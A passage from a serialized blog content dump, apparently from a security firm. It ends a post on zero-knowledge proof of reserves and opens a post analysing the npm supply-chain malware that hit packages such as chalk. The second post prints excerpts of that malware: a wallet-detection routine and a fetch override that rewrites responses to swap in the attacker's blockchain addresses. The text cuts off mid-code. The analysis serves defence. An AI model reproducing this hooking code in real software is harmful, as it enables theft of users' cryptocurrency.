by the PoR server.",{"type":26,"tag":3430,"props":99563,"children":99564},{},[99565,99570],{"type":26,"tag":84,"props":99566,"children":99567},{},[99568],{"type":32,"value":99569},"Proof File URL",{"type":32,"value":99571}," --> the URL where the proof was downloaded from. Users can download it to verify the proof's validity themselves.",{"type":26,"tag":3430,"props":99573,"children":99574},{},[99575,99580],{"type":26,"tag":84,"props":99576,"children":99577},{},[99578],{"type":32,"value":99579},"Prover Version",{"type":32,"value":99581}," --> the version of PoRv2 used. Using different versions for proving/verifying can result in errors due to ZK circuit discrepancies. Therefore, if you are going to verify the validity of the proof yourself, ensure that you download and use the same prover version as the proof.",{"type":26,"tag":3430,"props":99583,"children":99584},{},[99585,99590],{"type":26,"tag":84,"props":99586,"children":99587},{},[99588],{"type":32,"value":99589},"File Hash (SHA256)",{"type":32,"value":99591}," --> since we only store the URL of the proof, it can be maliciously changed after our verification. SHA256 can be used to prove if the file was modified after the verification. If you are going to verify the proof by yourself, check if the downloaded zip file matches the hash shown on the website.",{"type":26,"tag":35,"props":99593,"children":99594},{},[99595],{"type":32,"value":99596},"Also, you can check the exchange's liabilities on the website:",{"type":26,"tag":35,"props":99598,"children":99599},{},[99600],{"type":26,"tag":2210,"props":99601,"children":99603},{"alt":53181,"src":99602},"/posts/por/backpack-por-liabilities.png",[],{"type":26,"tag":35,"props":99605,"children":99606},{},[99607,99609,99615,99617,99623],{"type":32,"value":99608},"These are the amount of assets that the exchange should have in their reserves to be solvent on each asset. You can match if they have it by checking their reserve wallets on blockchain. You can see backpack's wallets in ",{"type":26,"tag":41,"props":99610,"children":99613},{"href":99611,"rel":99612},"https://backpack.exchange/reserves",[45],[99614],{"type":32,"value":99611},{"type":32,"value":99616}," and our verifier server for backpack at ",{"type":26,"tag":41,"props":99618,"children":99621},{"href":99619,"rel":99620},"https://backpack-por.osec.io/",[45],[99622],{"type":32,"value":99619},{"type":32,"value":470},{"type":26,"tag":92,"props":99625,"children":99627},{"id":99626},"self-verification",[99628],{"type":32,"value":99629},"Self-verification",{"type":26,"tag":35,"props":99631,"children":99632},{},[99633],{"type":32,"value":99634},"You, as a user, can verify both proofs by yourself, the inclusion proof to verify if you were included in the PoR total liabilities sum and the global proof to verify if the commitments provided by the exchange are valid.",{"type":26,"tag":118,"props":99636,"children":99638},{"id":99637},"how-to-verify-if-i-was-included",[99639],{"type":32,"value":99640},"How to verify if I was included?",{"type":26,"tag":35,"props":99642,"children":99643},{},[99644],{"type":32,"value":99645},"If you are a user and want to do the self-verification of inclusion, you will need to follow these steps:",{"type":26,"tag":4820,"props":99647,"children":99648},{},[99649,99660,99678],{"type":26,"tag":3430,"props":99650,"children":99651},{},[99652,99659],{"type":26,"tag":41,"props":99653,"children":99656},{"href":99654,"rel":99655},"https://github.com/otter-sec/por_v2/releases",[45],[99657],{"type":32,"value":99658},"Download the PoRv2 executable from our github",{"type":32,"value":470},{"type":26,"tag":3430,"props":99661,"children":99662},{},[99663,99665,99670,99671,99676],{"type":32,"value":99664},"Download the inclusion and the final proof files from the exchange (",{"type":26,"tag":130,"props":99666,"children":99668},{"className":99667},[],[99669],{"type":32,"value":99354},{"type":32,"value":3339},{"type":26,"tag":130,"props":99672,"children":99674},{"className":99673},[],[99675],{"type":32,"value":99329},{"type":32,"value":99677},") and put the files in the same directory as the PoRv2 app.",{"type":26,"tag":3430,"props":99679,"children":99680},{},[99681,99683,99689],{"type":32,"value":99682},"Open the terminal and execute this: ",{"type":26,"tag":130,"props":99684,"children":99686},{"className":99685},[],[99687],{"type":32,"value":99688},"./plonky2_por verify-inclusion",{"type":32,"value":470},{"type":26,"tag":35,"props":99691,"children":99692},{},[99693],{"type":32,"value":99694},"This will verify if the proofs are valid and show your asset balances. You will need to verify manually that the balances are correct. Remember that the proofs are not calculated in real-time; you must verify if the balances were correct at the proof generation date. Here is an example of a valid proof being verified:",{"type":26,"tag":5512,"props":99696,"children":99698},{"code":99697},"[!] The following information was used to generate the proof, please manually verify if they are correct:\n[!] NOTE: This is not real-time information, verify if the information is correct relative to the time of the proof generation\n[!] NOTE2: Some asset balances was rounded by some decimals, verify if they are close enough to the original balance\n======================\nProof generation date: 2025-02-22 19:59:59 UTC\nProof generation timestamp (ms): 1740254399944\nNumber of accounted assets: 100\n\n-----Asset balances-----\nETH: 0\nBTC: 1.2\nUSDC: 0\n...\n======================\n[!] Verifying global proof (trusting circuit data inside the file)...\n[+] Global proof is valid!\n[!] Verifying inclusion proof...\n[+] Inclusion proof root hash is valid! The user is included in the merkle tree!\n[+] Successfully verified inclusion proof for file: inclusion_proof_00476816e43cf2efffdabdda7f55c5203bc9e28382c551f83931de02fd364a25.json\n\n[+] All inclusion proofs are valid!\n[+] Finished in 13.731875ms!\n",[99699],{"type":26,"tag":130,"props":99700,"children":99701},{"__ignoreMap":7},[99702],{"type":32,"value":99697},{"type":26,"tag":118,"props":99704,"children":99706},{"id":99705},"how-can-i-verify-the-global-proof",[99707],{"type":32,"value":99708},"How can I verify the global proof?",{"type":26,"tag":35,"props":99710,"children":99711},{},[99712],{"type":32,"value":99713},"If you want to verify if the global proof is valid, you just need to follow these steps:",{"type":26,"tag":4820,"props":99715,"children":99716},{},[99717,99726,99744],{"type":26,"tag":3430,"props":99718,"children":99719},{},[99720,99725],{"type":26,"tag":41,"props":99721,"children":99723},{"href":99654,"rel":99722},[45],[99724],{"type":32,"value":99658},{"type":32,"value":470},{"type":26,"tag":3430,"props":99727,"children":99728},{},[99729,99731,99736,99737,99742],{"type":32,"value":99730},"Download the ",{"type":26,"tag":130,"props":99732,"children":99734},{"className":99733},[],[99735],{"type":32,"value":99322},{"type":32,"value":40146},{"type":26,"tag":130,"props":99738,"children":99740},{"className":99739},[],[99741],{"type":32,"value":99329},{"type":32,"value":99743}," files and put them in the same directory as the PoRv2 app. You can download those files from our PoR verifier server (download the zip file and unzip it).",{"type":26,"tag":3430,"props":99745,"children":99746},{},[99747,99749,99754],{"type":32,"value":99748},"Open the terminal and execute ",{"type":26,"tag":130,"props":99750,"children":99752},{"className":99751},[],[99753],{"type":32,"value":99688},{"type":32,"value":99755},". This might take a while to verify since it needs to deserialize a big file and verify the final proof circuit (which involves rebuilding it).",{"type":26,"tag":35,"props":99757,"children":99758},{},[99759],{"type":32,"value":99760},"This will verify the global proof and print the asset prices to be manually verified. Note that the asset prices shown are not real-time; you must match them to the price on the proof generation date and time.",{"type":26,"tag":5512,"props":99762,"children":99764},{"code":99763},"[!] Verifying the proof of reserves...\n[!] The following information was used to generate the proof, please manually verify if they are correct:\n[!] NOTE: This is not real-time information, verify if the information is correct relative to the time of the proof generation\n[!] NOTE2: Asset prices was rounded by some decimals, verify if they are close enough to the original price\n======================\nProof generation date: 2025-02-22 19:59:59 UTC\nProof generation timestamp (ms): 1740254399944\nNumber of accounted assets: 100\n\n-----Asset prices-----\nBTC: US$ 95000\nETH: US$ 2402.48\n...\n======================\n",[99765],{"type":26,"tag":130,"props":99766,"children":99767},{"__ignoreMap":7},[99768],{"type":32,"value":99763},{"type":26,"tag":35,"props":99770,"children":99771},{},[99772],{"type":32,"value":99773},"When verification is completed, and all proofs are valid, the system will print the summed balances of each asset. These are the liabilities of the exchange, which you can use to check if they have reserves to cover it.",{"type":26,"tag":5512,"props":99775,"children":99777},{"code":99776},"[!] Rebuilding root circuit... This might take several minutes...\n[+] Root circuit rebuilt successfully!\n[!] Verifying final proof...\n[+] Proof is valid!\n[!] Verifying asset prices...\n[+] Asset prices are valid!\n[!] Verifying asset decimals...\n[+] Asset decimals are valid!\n[!] Verifying merkle tree root hash...\n[+] Merkle tree root hash is valid!\n[!] Verifying merkle tree...\n[+] Merkle tree is valid!\n\n[!] The following information is the final needed asset reserves, which was validated by the Zero-Knowledge proof\n[!] NOTE: This is not real-time information, the information is relative to the time of the proof generation\n[!] NOTE2: We cannot guarantee that all users were included in the proof, but you can check if you were included by verifying the inclusion proof\n======================\nProof generation date: 2025-02-22 19:59:59 UTC\nProof generation timestamp (ms): 1740254399944\nNumber of accounted assets: 100\n\n-----Asset reserves-----\nBTC: 1.2\nETH: 5.4\n...\n======================\n\n[+] All proofs are valid!\n[+] Finished in 4.455745214s!\n",[99778],{"type":26,"tag":130,"props":99779,"children":99780},{"__ignoreMap":7},[99781],{"type":32,"value":99776},{"type":26,"tag":92,"props":99783,"children":99784},{"id":31526},[99785],{"type":32,"value":21540},{"type":26,"tag":35,"props":99787,"children":99788},{},[99789],{"type":32,"value":99790},"In conclusion, Proof of Reserves serves as a crucial mechanism for crypto platforms, enabling them to demonstrate solvency and gain user trust in a transparent manner. By employing zero-knowledge proofs, platforms can achieve this transparency without exposing sensitive user data, effectively proving total liabilities and ensuring non-negativity while preserving privacy. Our system further refines this process, boosting efficiency and eliminating the need for manual verification.",{"type":26,"tag":35,"props":99792,"children":99793},{},[99794,99796,99802],{"type":32,"value":99795},"We are currently working with Backpack to implement this algorithm ",{"type":26,"tag":41,"props":99797,"children":99799},{"href":99611,"rel":99798},[45],[99800],{"type":32,"value":99801},"in production",{"type":32,"value":99803}," to generate and verify proofs every 24 hours. This marks a significant advancement toward establishing a real-time Proof of Reserves system, particularly given that it offers increased transparency, which is a step forward in reducing the need for external audit companies, as users will be able to verify everything themselves.",{"type":26,"tag":35,"props":99805,"children":99806},{},[99807,99809,99816],{"type":32,"value":99808},"For more information about how Backpack Exchange implements Proof of Reserves in practice, you can read their detailed article: ",{"type":26,"tag":41,"props":99810,"children":99813},{"href":99811,"rel":99812},"https://learn.backpack.exchange/articles/proof-of-reserves-at-backpack",[45],[99814],{"type":32,"value":99815},"Proof of Reserves at Backpack Exchange: Real Transparency, ZK Verified",{"type":32,"value":470},{"title":7,"searchDepth":5412,"depth":5412,"links":99818},[99819,99820,99821,99822,99825,99830,99834,99835,99839],{"id":95087,"depth":5412,"text":95090},{"id":95168,"depth":5412,"text":95171},{"id":95238,"depth":5412,"text":95241},{"id":95292,"depth":5412,"text":95295,"children":99823},[99824],{"id":95371,"depth":5417,"text":95374},{"id":95459,"depth":5412,"text":95462,"children":99826},[99827,99828,99829],{"id":95532,"depth":5417,"text":95535},{"id":95995,"depth":5417,"text":95998},{"id":97726,"depth":5417,"text":97729},{"id":99303,"depth":5412,"text":99306,"children":99831},[99832,99833],{"id":11870,"depth":5417,"text":99311},{"id":99365,"depth":5417,"text":99368},{"id":99495,"depth":5412,"text":99498},{"id":99626,"depth":5412,"text":99629,"children":99836},[99837,99838],{"id":99637,"depth":5417,"text":99640},{"id":99705,"depth":5417,"text":99708},{"id":31526,"depth":5412,"text":21540},"content:blog:2025-08-27-how-proof-of-reserves-uses-zk-to-protect-your-funds.md","blog/2025-08-27-how-proof-of-reserves-uses-zk-to-protect-your-funds.md","blog/2025-08-27-how-proof-of-reserves-uses-zk-to-protect-your-funds",{"_path":99844,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":99845,"description":99846,"date":99847,"author":33795,"image":99848,"isFeatured":18,"onBlogPage":18,"tags":99850,"body":99853,"_type":5433,"_id":102279,"_source":5435,"_file":102280,"_stem":102281,"_extension":5438},"/blog/2025-09-13-how-to-survive-supply-chain-attacks","How to Survive Supply-Chain Attacks","The recent supply-chain attack on NPM showed how easily trusted dependencies can become delivery vectors for malware. Learn how the attack worked and practical defenses developers can implement to stay safe.","2025-09-13T12:00:00.000Z",{"src":99849,"width":16,"height":17},"/posts/supply-chain-attcks/title.png",[99851,99852],"npm","supply-chain",{"type":23,"children":99854,"toc":102262},[99855,99868,99873,99878,99884,99889,99897,100227,100235,100798,100806,101513,101519,101524,101530,101535,101540,101546,101551,101563,101568,101594,101681,101693,101718,101734,101739,101744,101950,101992,101997,102009,102015,102027,102069,102082,102162,102174,102187,102194,102205,102213,102219,102232,102237,102241,102246,102258],{"type":26,"tag":35,"props":99856,"children":99857},{},[99858,99860,99866],{"type":32,"value":99859},"The recent supply-chain attack on NPM sent shockwaves through the developer community and served as a stark reminder of the risks lurking within our dependencies. Malicious versions of widely used packages, including ",{"type":26,"tag":130,"props":99861,"children":99863},{"className":99862},[],[99864],{"type":32,"value":99865},"chalk",{"type":32,"value":99867},", were published containing sophisticated malware designed to steal cryptocurrency.",{"type":26,"tag":35,"props":99869,"children":99870},{},[99871],{"type":32,"value":99872},"This attack highlights a fundamental vulnerability in the open-source ecosystem: any package you install gets the same permissions as your own code, giving it a free pass to important resources such as cookies and the network stack.",{"type":26,"tag":35,"props":99874,"children":99875},{},[99876],{"type":32,"value":99877},"In this post, we'll break down how the malware worked and outline practical defenses developers can use, including Lavamoat, a tool already adopted by leaders in the web3 ecosystem.",{"type":26,"tag":92,"props":99879,"children":99881},{"id":99880},"qix-malware-how-it-worked",[99882],{"type":32,"value":99883},"Qix Malware: How It Worked",{"type":26,"tag":35,"props":99885,"children":99886},{},[99887],{"type":32,"value":99888},"The attacker published modified versions of packages with code designed to do three things:",{"type":26,"tag":4820,"props":99890,"children":99891},{},[99892],{"type":26,"tag":3430,"props":99893,"children":99894},{},[99895],{"type":32,"value":99896},"Detect crypto wallets: The malware checked for Ethereum wallets like MetaMask.",{"type":26,"tag":5512,"props":99898,"children":99900},{"code":99899,"language":33960,"meta":7,"className":33958,"style":7},"async function checkethereumw() {\n  try {\n    const _0x124ed3 = await window.ethereum.request({\n      'method': \"eth_accounts\"\n    });\n    if (_0x124ed3.length > 0) {\n      runmask();\n      if (rund != 1) {\n        rund = 1;\n        neth = 1;\n        newdlocal();\n      }\n    } else if (rund != 1) {\n      rund = 1;\n      newdlocal();\n    }\n  }\n}\n",[99901],{"type":26,"tag":130,"props":99902,"children":99903},{"__ignoreMap":7},[99904,99924,99936,99980,99997,100004,100040,100052,100080,100100,100120,100132,100139,100174,100194,100206,100213,100220],{"type":26,"tag":137,"props":99905,"children":99906},{"class":5559,"line":5560},[99907,99911,99915,99920],{"type":26,"tag":137,"props":99908,"children":99909},{"style":5573},[99910],{"type":32,"value":38741},{"type":26,"tag":137,"props":99912,"children":99913},{"style":5573},[99914],{"type":32,"value":40810},{"type":26,"tag":137,"props":99916,"children":99917},{"style":5682},[99918],{"type":32,"value":99919}," checkethereumw",{"type":26,"tag":137,"props":99921,"children":99922},{"style":5601},[99923],{"type":32,"value":18328},{"type":26,"tag":137,"props":99925,"children":99926},{"class":5559,"line":5412},[99927,99932],{"type":26,"tag":137,"props":99928,"children":99929},{"style":5610},[99930],{"type":32,"value":99931},"  try",{"type":26,"tag":137,"props":99933,"children":99934},{"style":5601},[99935],{"type":32,"value":5875},{"type":26,"tag":137,"props":99937,"children":99938},{"class":5559,"line":5417},[99939,99943,99948,99952,99956,99960,99964,99968,99972,99976],{"type":26,"tag":137,"props":99940,"children":99941},{"style":5573},[99942],{"type":32,"value":54271},{"type":26,"tag":137,"props":99944,"children":99945},{"style":5584},[99946],{"type":32,"value":99947}," _0x124ed3",{"type":26,"tag":137,"props":99949,"children":99950},{"style":5590},[99951],{"type":32,"value":5593},{"type":26,"tag":137,"props":99953,"children":99954},{"style":5610},[99955],{"type":32,"value":38807},{"type":26,"tag":137,"props":99957,"children":99958},{"style":5584},[99959],{"type":32,"value":34003},{"type":26,"tag":137,"props":99961,"children":99962},{"style":5601},[99963],{"type":32,"value":470},{"type":26,"tag":137,"props":99965,"children":99966},{"style":5584},[99967],{"type":32,"value":34012},{"type":26,"tag":137,"props":99969,"children":99970},{"style":5601},[99971],{"type":32,"value":470},{"type":26,"tag":137,"props":99973,"children":99974},{"style":5682},[99975],{"type":32,"value":34088},{"type":26,"tag":137,"props":99977,"children":99978},{"style":5601},[99979],{"type":32,"value":17732},{"type":26,"tag":137,"props":99981,"children":99982},{"class":5559,"line":5642},[99983,99988,99992],{"type":26,"tag":137,"props":99984,"children":99985},{"style":6837},[99986],{"type":32,"value":99987},"      'method'",{"type":26,"tag":137,"props":99989,"children":99990},{"style":5584},[99991],{"type":32,"value":7072},{"type":26,"tag":137,"props":99993,"children":99994},{"style":6837},[99995],{"type":32,"value":99996}," \"eth_accounts\"\n",{"type":26,"tag":137,"props":99998,"children":99999},{"class":5559,"line":5745},[100000],{"type":26,"tag":137,"props":100001,"children":100002},{"style":5601},[100003],{"type":32,"value":34852},{"type":26,"tag":137,"props":100005,"children":100006},{"class":5559,"line":5850},[100007,100011,100015,100020,100024,100028,100032,100036],{"type":26,"tag":137,"props":100008,"children":100009},{"style":5610},[100010],{"type":32,"value":14870},{"type":26,"tag":137,"props":100012,"children":100013},{"style":5601},[100014],{"type":32,"value":4625},{"type":26,"tag":137,"props":100016,"children":100017},{"style":5584},[100018],{"type":32,"value":100019},"_0x124ed3",{"type":26,"tag":137,"props":100021,"children":100022},{"style":5601},[100023],{"type":32,"value":470},{"type":26,"tag":137,"props":100025,"children":100026},{"style":5584},[100027],{"type":32,"value":11089},{"type":26,"tag":137,"props":100029,"children":100030},{"style":5590},[100031],{"type":32,"value":16785},{"type":26,"tag":137,"props":100033,"children":100034},{"style":5626},[100035],{"type":32,"value":5629},{"type":26,"tag":137,"props":100037,"children":100038},{"style":5601},[100039],{"type":32,"value":17395},{"type":26,"tag":137,"props":100041,"children":100042},{"class":5559,"line":5878},[100043,100048],{"type":26,"tag":137,"props":100044,"children":100045},{"style":5682},[100046],{"type":32,"value":100047},"      runmask",{"type":26,"tag":137,"props":100049,"children":100050},{"style":5601},[100051],{"type":32,"value":6267},{"type":26,"tag":137,"props":100053,"children":100054},{"class":5559,"line":5891},[100055,100059,100063,100068,100072,100076],{"type":26,"tag":137,"props":100056,"children":100057},{"style":5610},[100058],{"type":32,"value":41883},{"type":26,"tag":137,"props":100060,"children":100061},{"style":5601},[100062],{"type":32,"value":4625},{"type":26,"tag":137,"props":100064,"children":100065},{"style":5584},[100066],{"type":32,"value":100067},"rund",{"type":26,"tag":137,"props":100069,"children":100070},{"style":5590},[100071],{"type":32,"value":66987},{"type":26,"tag":137,"props":100073,"children":100074},{"style":5626},[100075],{"type":32,"value":7104},{"type":26,"tag":137,"props":100077,"children":100078},{"style":5601},[100079],{"type":32,"value":17395},{"type":26,"tag":137,"props":100081,"children":100082},{"class":5559,"line":5909},[100083,100088,100092,100096],{"type":26,"tag":137,"props":100084,"children":100085},{"style":5584},[100086],{"type":32,"value":100087},"        rund",{"type":26,"tag":137,"props":100089,"children":100090},{"style":5590},[100091],{"type":32,"value":5593},{"type":26,"tag":137,"props":100093,"children":100094},{"style":5626},[100095],{"type":32,"value":7104},{"type":26,"tag":137,"props":100097,"children":100098},{"style":5601},[100099],{"type":32,"value":5604},{"type":26,"tag":137,"props":100101,"children":100102},{"class":5559,"line":5930},[100103,100108,100112,100116],{"type":26,"tag":137,"props":100104,"children":100105},{"style":5584},[100106],{"type":32,"value":100107},"        neth",{"type":26,"tag":137,"props":100109,"children":100110},{"style":5590},[100111],{"type":32,"value":5593},{"type":26,"tag":137,"props":100113,"children":100114},{"style":5626},[100115],{"type":32,"value":7104},{"type":26,"tag":137,"props":100117,"children":100118},{"style":5601},[100119],{"type":32,"value":5604},{"type":26,"tag":137,"props":100121,"children":100122},{"class":5559,"line":5939},[100123,100128],{"type":26,"tag":137,"props":100124,"children":100125},{"style":5682},[100126],{"type":32,"value":100127},"        newdlocal",{"type":26,"tag":137,"props":100129,"children":100130},{"style":5601},[100131],{"type":32,"value":6267},{"type":26,"tag":137,"props":100133,"children":100134},{"class":5559,"line":6191},[100135],{"type":26,"tag":137,"props":100136,"children":100137},{"style":5601},[100138],{"type":32,"value":15255},{"type":26,"tag":137,"props":100140,"children":100141},{"class":5559,"line":6208},[100142,100146,100150,100154,100158,100162,100166,100170],{"type":26,"tag":137,"props":100143,"children":100144},{"style":5601},[100145],{"type":32,"value":18371},{"type":26,"tag":137,"props":100147,"children":100148},{"style":5610},[100149],{"type":32,"value":5902},{"type":26,"tag":137,"props":100151,"children":100152},{"style":5610},[100153],{"type":32,"value":18380},{"type":26,"tag":137,"props":100155,"children":100156},{"style":5601},[100157],{"type":32,"value":4625},{"type":26,"tag":137,"props":100159,"children":100160},{"style":5584},[100161],{"type":32,"value":100067},{"type":26,"tag":137,"props":100163,"children":100164},{"style":5590},[100165],{"type":32,"value":66987},{"type":26,"tag":137,"props":100167,"children":100168},{"style":5626},[100169],{"type":32,"value":7104},{"type":26,"tag":137,"props":100171,"children":100172},{"style":5601},[100173],{"type":32,"value":17395},{"type":26,"tag":137,"props":100175,"children":100176},{"class":5559,"line":6225},[100177,100182,100186,100190],{"type":26,"tag":137,"props":100178,"children":100179},{"style":5584},[100180],{"type":32,"value":100181},"      rund",{"type":26,"tag":137,"props":100183,"children":100184},{"style":5590},[100185],{"type":32,"value":5593},{"type":26,"tag":137,"props":100187,"children":100188},{"style":5626},[100189],{"type":32,"value":7104},{"type":26,"tag":137,"props":100191,"children":100192},{"style":5601},[100193],{"type":32,"value":5604},{"type":26,"tag":137,"props":100195,"children":100196},{"class":5559,"line":6238},[100197,100202],{"type":26,"tag":137,"props":100198,"children":100199},{"style":5682},[100200],{"type":32,"value":100201},"      newdlocal",{"type":26,"tag":137,"props":100203,"children":100204},{"style":5601},[100205],{"type":32,"value":6267},{"type":26,"tag":137,"props":100207,"children":100208},{"class":5559,"line":6247},[100209],{"type":26,"tag":137,"props":100210,"children":100211},{"style":5601},[100212],{"type":32,"value":5945},{"type":26,"tag":137,"props":100214,"children":100215},{"class":5559,"line":6270},[100216],{"type":26,"tag":137,"props":100217,"children":100218},{"style":5601},[100219],{"type":32,"value":8457},{"type":26,"tag":137,"props":100221,"children":100222},{"class":5559,"line":6279},[100223],{"type":26,"tag":137,"props":100224,"children":100225},{"style":5601},[100226],{"type":32,"value":6507},{"type":26,"tag":4820,"props":100228,"children":100229},{"start":5412},[100230],{"type":26,"tag":3430,"props":100231,"children":100232},{},[100233],{"type":32,"value":100234},"Intercept HTTP requests/responses and replace blockchain addresses with the attacker's wallet: (modified code for better understanding)",{"type":26,"tag":5512,"props":100236,"children":100238},{"code":100237,"language":33960,"meta":7,"className":33958,"style":7},"fetch = async function (...args) {\n  const originalResponse = await originalFetch.call(this, ...args);\n  const contentType = originalResponse.headers.get('Content-Type') || '';\n  let data;\n  if (contentType.includes('application/json')) {\n    data = await originalResponse.clone().json();\n  } else {\n    data = await originalResponse.clone().text();\n  }\n  const processedData = replaceAddresses(data);\n  const finalResponseText =\n    typeof processedData === 'string' ? processedData : JSON.stringify(processedData);\n  const finalResponse = new Response(finalResponseText, {\n    status: originalResponse.status,\n    statusText: originalResponse.statusText,\n    headers: originalResponse.headers,\n  });\n  return finalResponse;\n};\n",[100239],{"type":26,"tag":130,"props":100240,"children":100241},{"__ignoreMap":7},[100242,100277,100334,100396,100411,100448,100487,100502,100541,100548,100581,100597,100656,100694,100719,100744,100768,100776,100791],{"type":26,"tag":137,"props":100243,"children":100244},{"class":5559,"line":5560},[100245,100249,100253,100257,100261,100265,100269,100273],{"type":26,"tag":137,"props":100246,"children":100247},{"style":5682},[100248],{"type":32,"value":36690},{"type":26,"tag":137,"props":100250,"children":100251},{"style":5590},[100252],{"type":32,"value":5593},{"type":26,"tag":137,"props":100254,"children":100255},{"style":5573},[100256],{"type":32,"value":38961},{"type":26,"tag":137,"props":100258,"children":100259},{"style":5573},[100260],{"type":32,"value":40810},{"type":26,"tag":137,"props":100262,"children":100263},{"style":5601},[100264],{"type":32,"value":4625},{"type":26,"tag":137,"props":100266,"children":100267},{"style":5590},[100268],{"type":32,"value":12180},{"type":26,"tag":137,"props":100270,"children":100271},{"style":5584},[100272],{"type":32,"value":40824},{"type":26,"tag":137,"props":100274,"children":100275},{"style":5601},[100276],{"type":32,"value":17395},{"type":26,"tag":137,"props":100278,"children":100279},{"class":5559,"line":5412},[100280,100284,100289,100293,100297,100302,100306,100310,100314,100318,100322,100326,100330],{"type":26,"tag":137,"props":100281,"children":100282},{"style":5573},[100283],{"type":32,"value":38784},{"type":26,"tag":137,"props":100285,"children":100286},{"style":5584},[100287],{"type":32,"value":100288}," originalResponse",{"type":26,"tag":137,"props":100290,"children":100291},{"style":5590},[100292],{"type":32,"value":5593},{"type":26,"tag":137,"props":100294,"children":100295},{"style":5610},[100296],{"type":32,"value":38807},{"type":26,"tag":137,"props":100298,"children":100299},{"style":5584},[100300],{"type":32,"value":100301}," originalFetch",{"type":26,"tag":137,"props":100303,"children":100304},{"style":5601},[100305],{"type":32,"value":470},{"type":26,"tag":137,"props":100307,"children":100308},{"style":5682},[100309],{"type":32,"value":40892},{"type":26,"tag":137,"props":100311,"children":100312},{"style":5601},[100313],{"type":32,"value":165},{"type":26,"tag":137,"props":100315,"children":100316},{"style":5573},[100317],{"type":32,"value":20285},{"type":26,"tag":137,"props":100319,"children":100320},{"style":5601},[100321],{"type":32,"value":1108},{"type":26,"tag":137,"props":100323,"children":100324},{"style":5590},[100325],{"type":32,"value":12180},{"type":26,"tag":137,"props":100327,"children":100328},{"style":5584},[100329],{"type":32,"value":40824},{"type":26,"tag":137,"props":100331,"children":100332},{"style":5601},[100333],{"type":32,"value":6430},{"type":26,"tag":137,"props":100335,"children":100336},{"class":5559,"line":5417},[100337,100341,100346,100350,100354,100358,100363,100367,100371,100375,100380,100384,100388,100392],{"type":26,"tag":137,"props":100338,"children":100339},{"style":5573},[100340],{"type":32,"value":38784},{"type":26,"tag":137,"props":100342,"children":100343},{"style":5584},[100344],{"type":32,"value":100345}," contentType",{"type":26,"tag":137,"props":100347,"children":100348},{"style":5590},[100349],{"type":32,"value":5593},{"type":26,"tag":137,"props":100351,"children":100352},{"style":5584},[100353],{"type":32,"value":100288},{"type":26,"tag":137,"props":100355,"children":100356},{"style":5601},[100357],{"type":32,"value":470},{"type":26,"tag":137,"props":100359,"children":100360},{"style":5584},[100361],{"type":32,"value":100362},"headers",{"type":26,"tag":137,"props":100364,"children":100365},{"style":5601},[100366],{"type":32,"value":470},{"type":26,"tag":137,"props":100368,"children":100369},{"style":5682},[100370],{"type":32,"value":18944},{"type":26,"tag":137,"props":100372,"children":100373},{"style":5601},[100374],{"type":32,"value":165},{"type":26,"tag":137,"props":100376,"children":100377},{"style":6837},[100378],{"type":32,"value":100379},"'Content-Type'",{"type":26,"tag":137,"props":100381,"children":100382},{"style":5601},[100383],{"type":32,"value":5671},{"type":26,"tag":137,"props":100385,"children":100386},{"style":5590},[100387],{"type":32,"value":24998},{"type":26,"tag":137,"props":100389,"children":100390},{"style":6837},[100391],{"type":32,"value":34434},{"type":26,"tag":137,"props":100393,"children":100394},{"style":5601},[100395],{"type":32,"value":5604},{"type":26,"tag":137,"props":100397,"children":100398},{"class":5559,"line":5642},[100399,100403,100407],{"type":26,"tag":137,"props":100400,"children":100401},{"style":5573},[100402],{"type":32,"value":10440},{"type":26,"tag":137,"props":100404,"children":100405},{"style":5584},[100406],{"type":32,"value":17696},{"type":26,"tag":137,"props":100408,"children":100409},{"style":5601},[100410],{"type":32,"value":5604},{"type":26,"tag":137,"props":100412,"children":100413},{"class":5559,"line":5745},[100414,100418,100422,100427,100431,100435,100439,100444],{"type":26,"tag":137,"props":100415,"children":100416},{"style":5610},[100417],{"type":32,"value":33989},{"type":26,"tag":137,"props":100419,"children":100420},{"style":5601},[100421],{"type":32,"value":4625},{"type":26,"tag":137,"props":100423,"children":100424},{"style":5584},[100425],{"type":32,"value":100426},"contentType",{"type":26,"tag":137,"props":100428,"children":100429},{"style":5601},[100430],{"type":32,"value":470},{"type":26,"tag":137,"props":100432,"children":100433},{"style":5682},[100434],{"type":32,"value":37777},{"type":26,"tag":137,"props":100436,"children":100437},{"style":5601},[100438],{"type":32,"value":165},{"type":26,"tag":137,"props":100440,"children":100441},{"style":6837},[100442],{"type":32,"value":100443},"'application/json'",{"type":26,"tag":137,"props":100445,"children":100446},{"style":5601},[100447],{"type":32,"value":37790},{"type":26,"tag":137,"props":100449,"children":100450},{"class":5559,"line":5850},[100451,100455,100459,100463,100467,100471,100475,100479,100483],{"type":26,"tag":137,"props":100452,"children":100453},{"style":5584},[100454],{"type":32,"value":45830},{"type":26,"tag":137,"props":100456,"children":100457},{"style":5590},[100458],{"type":32,"value":5593},{"type":26,"tag":137,"props":100460,"children":100461},{"style":5610},[100462],{"type":32,"value":38807},{"type":26,"tag":137,"props":100464,"children":100465},{"style":5584},[100466],{"type":32,"value":100288},{"type":26,"tag":137,"props":100468,"children":100469},{"style":5601},[100470],{"type":32,"value":470},{"type":26,"tag":137,"props":100472,"children":100473},{"style":5682},[100474],{"type":32,"value":18011},{"type":26,"tag":137,"props":100476,"children":100477},{"style":5601},[100478],{"type":32,"value":32762},{"type":26,"tag":137,"props":100480,"children":100481},{"style":5682},[100482],{"type":32,"value":36593},{"type":26,"tag":137,"props":100484,"children":100485},{"style":5601},[100486],{"type":32,"value":6267},{"type":26,"tag":137,"props":100488,"children":100489},{"class":5559,"line":5878},[100490,100494,100498],{"type":26,"tag":137,"props":100491,"children":100492},{"style":5601},[100493],{"type":32,"value":34063},{"type":26,"tag":137,"props":100495,"children":100496},{"style":5610},[100497],{"type":32,"value":5902},{"type":26,"tag":137,"props":100499,"children":100500},{"style":5601},[100501],{"type":32,"value":5875},{"type":26,"tag":137,"props":100503,"children":100504},{"class":5559,"line":5891},[100505,100509,100513,100517,100521,100525,100529,100533,100537],{"type":26,"tag":137,"props":100506,"children":100507},{"style":5584},[100508],{"type":32,"value":45830},{"type":26,"tag":137,"props":100510,"children":100511},{"style":5590},[100512],{"type":32,"value":5593},{"type":26,"tag":137,"props":100514,"children":100515},{"style":5610},[100516],{"type":32,"value":38807},{"type":26,"tag":137,"props":100518,"children":100519},{"style":5584},[100520],{"type":32,"value":100288},{"type":26,"tag":137,"props":100522,"children":100523},{"style":5601},[100524],{"type":32,"value":470},{"type":26,"tag":137,"props":100526,"children":100527},{"style":5682},[100528],{"type":32,"value":18011},